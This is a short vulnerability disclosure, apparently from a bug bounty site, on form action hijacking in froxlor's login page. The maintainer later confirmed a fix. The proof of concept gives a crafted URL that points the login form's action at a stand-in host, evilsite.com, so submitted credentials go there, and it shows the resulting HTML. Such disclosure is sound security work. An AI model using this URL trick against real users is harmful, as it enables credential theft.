External Control of File Name or Path in froxlor/froxlor

Valid

Reported on

Aug 25th 2021


✍️ Description

The login form POST request can be hijacked so that the credentials will be sent to an external website, by modifying the login page URL.

🕵️‍♂️ Proof of Concept

Change the login page URL to

https://mydomain.com/index.php/evilsite.com

Then the form action in the webpage will be changed to

<section class="loginsec">
            <form method="post" action="evilsite.com" enctype="application/x-www-form-urlencoded">
                <input type="hidden" name="script" value="" />
                <input type="hidden" name="qrystr" value="" />

💥 Impact

Form action hijacking vulnerabilities arise when an application places user-supplied input into the action URL of an HTML form. An attacker can use this vulnerability to construct a URL that, if visited by another application user, will modify the action URL of a form to point to the attacker's server. If a user submits the form then its contents, including any input from the victim user, will be delivered directly to the attacker.

Occurences

We have contacted a member of the froxlor team and are waiting to hear back 3 months ago
froxlor/froxlor maintainer confirmed that a fix has been merged on 5d375b 3 months ago
The fix bounty has been dropped